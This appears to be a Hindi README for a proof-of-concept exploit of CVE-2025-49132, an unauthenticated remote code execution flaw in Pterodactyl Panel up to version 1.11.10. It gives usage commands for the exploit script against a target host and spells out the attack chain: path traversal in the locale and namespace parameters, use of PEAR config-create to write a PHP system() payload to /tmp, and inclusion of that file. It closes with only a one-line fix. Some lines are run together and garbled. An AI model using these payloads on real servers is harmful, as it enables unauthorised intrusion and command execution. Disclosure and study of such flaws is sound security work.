
CVE-2025-49132 (GHSA-24wv-6c99-f843) के लिए PoC शोषण – Pterodactyl Panel ≤ 1.11.10 में अप्रमाणित रिमोट कोड निष्पादन
Pterodactyl Panel - अप्रमाणित रिमोट कोड निष्पादन (RCE)
CVE‑2025‑49132 एक गंभीर रिमोट कोड निष्पादन भेद्यता है जो Pterodactyl Panel <= 1.11.10 को प्रभावित करती है।
एक अप्रमाणित हमलावर /locales/locale.json एंडपॉइंट में अनुचित इनपुट सत्यापन का शोषण करके मनमानी सिस्टम कमांड निष्पादित कर सकता है।
संस्करण में पैच किया गया: 1.11.11
सफल शोषण अनुमति देता है:
.env)गंभीरता: गंभीर
भेद्यता निम्नलिखित के अनुचित सत्यापन के कारण मौजूद है:
locale पैरामीटरnamespace पैरामीटरएक हमलावर यह कर सकता है:
../../../../../)config-create का लाभ उठाएं/tmp में मनमाने PHP पेलोड लिखेंकमजोरी वर्गीकरण: CWE-94 -- कोड जनरेशन का अनुचित नियंत्रण
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
डिफ़ॉल्ट पथ:
/usr/share/php/PEAR
/phpinfo.php पेज से उचित पथ प्राप्त करें

हमलावर इसका उपयोग करके /tmp/payload.php में एक दुर्भावनापूर्ण PHP पेलोड इंजेक्ट करता है:
/<?=system('id')?>+/tmp/payload.php
कॉल करके:
?locale=../../../../../tmp&namespace=payload
सर्वर इंजेक्ट किए गए PHP को निष्पादित करता है।

locale और namespace इनपुट को सैनिटाइज़ करें